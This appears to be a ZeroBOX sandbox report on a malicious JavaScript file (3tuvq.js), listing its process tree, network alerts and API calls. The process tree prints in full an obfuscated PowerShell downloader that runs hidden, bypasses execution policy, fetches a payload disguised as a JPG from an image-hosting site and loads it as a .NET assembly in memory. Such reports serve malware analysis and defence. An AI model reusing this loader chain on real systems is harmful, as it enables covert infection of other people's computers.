Summary | ZeroBOX

3tuvq.js

Generic Malware Antivirus ActiveXObject PowerShell
Category Machine Started Completed
FILE s1_win7_x6401 Nov. 28, 2023, 10:07 a.m. Nov. 28, 2023, 10:09 a.m.
Size 37.7KB
Type Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
MD5 a758953be379c89a34398eb1fc1f233a
SHA256 3b15e80745d77ea0978adab892616ef94a6a28954c50864742a79b10ea2e850a
CRC32 7026179F
ssdeep 768:J3CFNPfxSP4TPxj2j6lL4ir6Nr6MLr6Kwr6vyJe8PgQViCF7AL4Jc/Sr6Nr6WCLc:J3CFNnxSAT5j2j78I9Y0b8/ViCZWsI8A
Yara
  • Javascript_ActiveXObject - Use ActiveXObject JavaScript

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\3tuvq.js

    2556
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚VQBy♛♚Gw♛♚I♛♚♛♚9♛♚C♛♚♛♚JwBo♛♚HQ♛♚d♛♚Bw♛♚HM♛♚Og♛♚v♛♚C8♛♚dQBw♛♚Gw♛♚bwBh♛♚GQ♛♚Z♛♚Bl♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBu♛♚HM♛♚LgBj♛♚G8♛♚bQ♛♚u♛♚GI♛♚cg♛♚v♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBz♛♚C8♛♚M♛♚♛♚w♛♚DQ♛♚Lw♛♚2♛♚DY♛♚Ng♛♚v♛♚DY♛♚O♛♚♛♚z♛♚C8♛♚bwBy♛♚Gk♛♚ZwBp♛♚G4♛♚YQBs♛♚C8♛♚agBz♛♚C4♛♚agBw♛♚Gc♛♚Pw♛♚x♛♚Dc♛♚M♛♚♛♚w♛♚DE♛♚O♛♚♛♚z♛♚Dg♛♚Ng♛♚0♛♚Cc♛♚Ow♛♚k♛♚Hc♛♚ZQBi♛♚EM♛♚b♛♚Bp♛♚GU♛♚bgB0♛♚C♛♚♛♚PQ♛♚g♛♚E4♛♚ZQB3♛♚C0♛♚TwBi♛♚Go♛♚ZQBj♛♚HQ♛♚I♛♚BT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚E4♛♚ZQB0♛♚C4♛♚VwBl♛♚GI♛♚QwBs♛♚Gk♛♚ZQBu♛♚HQ♛♚Ow♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚I♛♚♛♚9♛♚C♛♚♛♚J♛♚B3♛♚GU♛♚YgBD♛♚Gw♛♚aQBl♛♚G4♛♚d♛♚♛♚u♛♚EQ♛♚bwB3♛♚G4♛♚b♛♚Bv♛♚GE♛♚Z♛♚BE♛♚GE♛♚d♛♚Bh♛♚Cg♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚VQBy♛♚Gw♛♚KQ♛♚7♛♚CQ♛♚aQBt♛♚GE♛♚ZwBl♛♚FQ♛♚ZQB4♛♚HQ♛♚I♛♚♛♚9♛♚C♛♚♛♚WwBT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚FQ♛♚ZQB4♛♚HQ♛♚LgBF♛♚G4♛♚YwBv♛♚GQ♛♚aQBu♛♚Gc♛♚XQ♛♚6♛♚Do♛♚VQBU♛♚EY♛♚O♛♚♛♚u♛♚Ec♛♚ZQB0♛♚FM♛♚d♛♚By♛♚Gk♛♚bgBn♛♚Cg♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚QgB5♛♚HQ♛♚ZQBz♛♚Ck♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BG♛♚Gw♛♚YQBn♛♚C♛♚♛♚PQ♛♚g♛♚Cc♛♚P♛♚♛♚8♛♚EI♛♚QQBT♛♚EU♛♚Ng♛♚0♛♚F8♛♚UwBU♛♚EE♛♚UgBU♛♚D4♛♚Pg♛♚n♛♚Ds♛♚J♛♚Bl♛♚G4♛♚Z♛♚BG♛♚Gw♛♚YQBn♛♚C♛♚♛♚PQ♛♚g♛♚Cc♛♚P♛♚♛♚8♛♚EI♛♚QQBT♛♚EU♛♚Ng♛♚0♛♚F8♛♚RQBO♛♚EQ♛♚Pg♛♚+♛♚Cc♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚9♛♚C♛♚♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚V♛♚Bl♛♚Hg♛♚d♛♚♛♚u♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚BP♛♚GY♛♚K♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BG♛♚Gw♛♚YQBn♛♚Ck♛♚Ow♛♚k♛♚GU♛♚bgBk♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBU♛♚GU♛♚e♛♚B0♛♚C4♛♚SQBu♛♚GQ♛♚ZQB4♛♚E8♛♚Zg♛♚o♛♚CQ♛♚ZQBu♛♚GQ♛♚RgBs♛♚GE♛♚Zw♛♚p♛♚Ds♛♚J♛♚Bz♛♚HQ♛♚YQBy♛♚HQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚LQBn♛♚GU♛♚I♛♚♛♚w♛♚C♛♚♛♚LQBh♛♚G4♛♚Z♛♚♛♚g♛♚CQ♛♚ZQBu♛♚GQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚LQBn♛♚HQ♛♚I♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚r♛♚D0♛♚I♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BG♛♚Gw♛♚YQBn♛♚C4♛♚T♛♚Bl♛♚G4♛♚ZwB0♛♚Gg♛♚Ow♛♚k♛♚GI♛♚YQBz♛♚GU♛♚Ng♛♚0♛♚Ew♛♚ZQBu♛♚Gc♛♚d♛♚Bo♛♚C♛♚♛♚PQ♛♚g♛♚CQ♛♚ZQBu♛♚GQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚LQ♛♚g♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚7♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚QwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚♛
♚g♛♚D0♛♚I♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBU♛♚GU♛♚e♛♚B0♛♚C4♛♚UwB1♛♚GI♛♚cwB0♛♚HI♛♚aQBu♛♚Gc♛♚K♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚L♛♚♛♚g♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚T♛♚Bl♛♚G4♛♚ZwB0♛♚Gg♛♚KQ♛♚7♛♚CQ♛♚YwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚BC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚I♛♚♛♚9♛♚C♛♚♛♚WwBT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚EM♛♚bwBu♛♚HY♛♚ZQBy♛♚HQ♛♚XQ♛♚6♛♚Do♛♚RgBy♛♚G8♛♚bQBC♛♚GE♛♚cwBl♛♚DY♛♚N♛♚BT♛♚HQ♛♚cgBp♛♚G4♛♚Zw♛♚o♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚QwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚♛♚p♛♚Ds♛♚J♛♚Bs♛♚G8♛♚YQBk♛♚GU♛♚Z♛♚BB♛♚HM♛♚cwBl♛♚G0♛♚YgBs♛♚Hk♛♚I♛♚♛♚9♛♚C♛♚♛♚WwBT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚FI♛♚ZQBm♛♚Gw♛♚ZQBj♛♚HQ♛♚aQBv♛♚G4♛♚LgBB♛♚HM♛♚cwBl♛♚G0♛♚YgBs♛♚Hk♛♚XQ♛♚6♛♚Do♛♚T♛♚Bv♛♚GE♛♚Z♛♚♛♚o♛♚CQ♛♚YwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚BC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚KQ♛♚7♛♚CQ♛♚d♛♚B5♛♚H♛♚♛♚ZQ♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Gw♛♚bwBh♛♚GQ♛♚ZQBk♛♚EE♛♚cwBz♛♚GU♛♚bQBi♛♚Gw♛♚eQ♛♚u♛♚Ec♛♚ZQB0♛♚FQ♛♚eQBw♛♚GU♛♚K♛♚♛♚n♛♚EY♛♚aQBi♛♚GU♛♚cg♛♚u♛♚Eg♛♚bwBt♛♚GU♛♚Jw♛♚p♛♚Ds♛♚J♛♚Bt♛♚GU♛♚d♛♚Bo♛♚G8♛♚Z♛♚♛♚g♛♚D0♛♚I♛♚♛♚k♛♚HQ♛♚eQBw♛♚GU♛♚LgBH♛♚GU♛♚d♛♚BN♛♚GU♛♚d♛♚Bo♛♚G8♛♚Z♛♚♛♚o♛♚Cc♛♚VgBB♛♚Ek♛♚Jw♛♚p♛♚C4♛♚SQBu♛♚HY♛♚bwBr♛♚GU♛♚K♛♚♛♚k♛♚G4♛♚dQBs♛♚Gw♛♚L♛♚♛♚g♛♚Fs♛♚bwBi♛♚Go♛♚ZQBj♛♚HQ♛♚WwBd♛♚F0♛♚I♛♚♛♚o♛♚Cc♛♚Z♛♚BI♛♚Gg♛♚M♛♚BM♛♚G4♛♚a♛♚♛♚z♛♚Fo♛♚MgBZ♛♚Ho♛♚T♛♚B6♛♚GM♛♚M♛♚BM♛♚Go♛♚WQ♛♚w♛♚E0♛♚aQ♛♚0♛♚Hk♛♚TwBT♛♚DQ♛♚e♛♚BP♛♚FM♛♚O♛♚B2♛♚E8♛♚bgBC♛♚D♛♚♛♚Z♛♚BH♛♚Gc♛♚PQ♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚Z♛♚Bm♛♚GQ♛♚ZgBk♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GY♛♚Z♛♚Bm♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GY♛♚Z♛♚Bm♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GE♛♚Z♛♚Bz♛♚GE♛♚Jw♛♚g♛♚Cw♛♚I♛♚♛♚n♛♚GQ♛♚ZQ♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚YwB1♛♚Cc♛♚KQ♛♚p♛♚♛♚==';$OWjuxd = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($codigo.replace('♛♚','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxd"

      2696
      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/666/683/original/js.jpg?1700183864';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0Lnh3Z2YzLzc0LjY0Mi4yOS4xOS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"

        2800

IP Address Status Action
104.21.84.67 Active Moloch
121.254.136.9 Active Moloch
164.124.101.2 Active Moloch
172.67.215.45 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49161 -> 104.21.84.67:443 2034978 ET POLICY Pastebin-style Service (paste .ee) in TLS SNI Potential Corporate Privacy Violation
TCP 192.168.56.101:49161 -> 104.21.84.67:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49166 -> 172.67.215.45:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1 192.168.56.101:49161 -> 104.21.84.67:443 C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 CN=paste.ee 75:09:97:90:38:ad:dd:cc:0d:1b:d8:8b:02:ab:5d:a9:3b:7a:1f:1d
TLSv1 192.168.56.101:49166 -> 172.67.215.45:443 C=US, O=Let's Encrypt, CN=E1 CN=uploaddeimagens.com.br d4:47:9f:16:cd:db:0a:99:1e:d8:a8:20:24:9b:c9:bb:4c:62:39:71

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Exception calling "DownloadData" with "1" argument(s): "The underlying connecti
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: on was closed: Could not establish trust relationship for the SSL/TLS secure ch
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: annel."
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: At line:1 char:174
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: + $imageUrl = 'https://uploaddeimagens.com.br/images/004/666/683/original/js.jp
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: g?1700183864';$webClient = New-Object System.Net.WebClient;$imageBytes = $webCl
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: ient.DownloadData <<<< ($imageUrl);$imageText = [System.Text.Encoding]::UTF8.Ge
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: tString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: ';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $start
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: Flag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: .Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBa
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: se64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load
console_handle: 0x000000b3
1 1 0

WriteConsoleW

buffer: ($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.G
console_handle: 0x000000bf
1 1 0

WriteConsoleW

buffer: etMethod('VAI').Invoke($null, [object[]] ('dHh0Lnh3Z2YzLzc0LjY0Mi4yOS4xOS8vOnB0
console_handle: 0x000000cb
1 1 0

WriteConsoleW

buffer: dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))
console_handle: 0x000000d7
1 1 0

WriteConsoleW

buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x000000ef
1 1 0

WriteConsoleW

buffer: Exception calling "GetString" with "1" argument(s): "Array cannot be null.
console_handle: 0x0000010f
1 1 0

WriteConsoleW

buffer: Parameter name: bytes"
console_handle: 0x0000011b
1 1 0

WriteConsoleW

buffer: At line:1 char:237
console_handle: 0x00000127
1 1 0

WriteConsoleW

buffer: + $imageUrl = 'https://uploaddeimagens.com.br/images/004/666/683/original/js.jp
console_handle: 0x00000133
1 1 0

WriteConsoleW

buffer: g?1700183864';$webClient = New-Object System.Net.WebClient;$imageBytes = $webCl
console_handle: 0x0000013f
1 1 0

WriteConsoleW

buffer: ient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetStrin
console_handle: 0x0000014b
1 1 0

WriteConsoleW

buffer: g <<<< ($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>
console_handle: 0x00000157
1 1 0

WriteConsoleW

buffer: ';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($
console_handle: 0x00000163
1 1 0

WriteConsoleW

buffer: endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $start
console_handle: 0x0000016f
1 1 0

WriteConsoleW

buffer: Flag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText
console_handle: 0x0000017b
1 1 0

WriteConsoleW

buffer: .Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBa
console_handle: 0x00000187
1 1 0

WriteConsoleW

buffer: se64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load
console_handle: 0x00000193
1 1 0

WriteConsoleW

buffer: ($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.G
console_handle: 0x0000019f
1 1 0

WriteConsoleW

buffer: etMethod('VAI').Invoke($null, [object[]] ('dHh0Lnh3Z2YzLzc0LjY0Mi4yOS4xOS8vOnB0
console_handle: 0x000001ab
1 1 0

WriteConsoleW

buffer: dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))
console_handle: 0x000001b7
1 1 0

WriteConsoleW

buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000001c3
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x000001cf
1 1 0

WriteConsoleW

buffer: You cannot call a method on a null-valued expression.
console_handle: 0x000001ef
1 1 0

WriteConsoleW

buffer: At line:1 char:343
console_handle: 0x000001fb
1 1 0

WriteConsoleW

buffer: + $imageUrl = 'https://uploaddeimagens.com.br/images/004/666/683/original/js.jp
console_handle: 0x00000207
1 1 0

WriteConsoleW

buffer: g?1700183864';$webClient = New-Object System.Net.WebClient;$imageBytes = $webCl
console_handle: 0x00000213
1 1 0

WriteConsoleW

buffer: ient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetStrin
console_handle: 0x0000021f
1 1 0

WriteConsoleW

buffer: g($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$sta
console_handle: 0x0000022b
1 1 0

WriteConsoleW

buffer: rtIndex = $imageText.IndexOf <<<< ($startFlag);$endIndex = $imageText.IndexOf($
console_handle: 0x00000237
1 1 0

WriteConsoleW

buffer: endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $start
console_handle: 0x00000243
1 1 0

WriteConsoleW

buffer: Flag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText
console_handle: 0x0000024f
1 1 0

WriteConsoleW

buffer: .Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBa
console_handle: 0x0000025b
1 1 0

WriteConsoleW

buffer: se64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load
console_handle: 0x00000267
1 1 0

WriteConsoleW

buffer: ($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.G
console_handle: 0x00000273
1 1 0

WriteConsoleW

buffer: etMethod('VAI').Invoke($null, [object[]] ('dHh0Lnh3Z2YzLzc0LjY0Mi4yOS4xOS8vOnB0
console_handle: 0x0000027f
1 1 0

WriteConsoleW

buffer: dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))
console_handle: 0x0000028b
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (IndexOf:String) [], RuntimeEx
console_handle: 0x00000297
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00586460
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005869e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005869e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005869e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00586560
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00586560
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00586560
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00586560
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00586560
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00586560
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00586020
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00586020
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00586020
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005869e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005869e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005869e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005868e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005869e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005869e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005869e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005869e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005869e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005869e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005869e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00586160
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00586160
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00586160
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00586160
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00586160
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00586160
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00586160
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00586160
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00586160
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00586160
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00586160
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00586160
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00586160
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00586160
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00586de0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00586de0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006518b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006522b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006522b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006522b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00651970
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00651970
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00651970
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00651970
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00651970
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00651970
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
request GET http://apps.identrust.com/roots/dstrootcax3.p7c
request GET https://paste.ee/d/Oe5nV
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 2228224
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02940000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2696
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
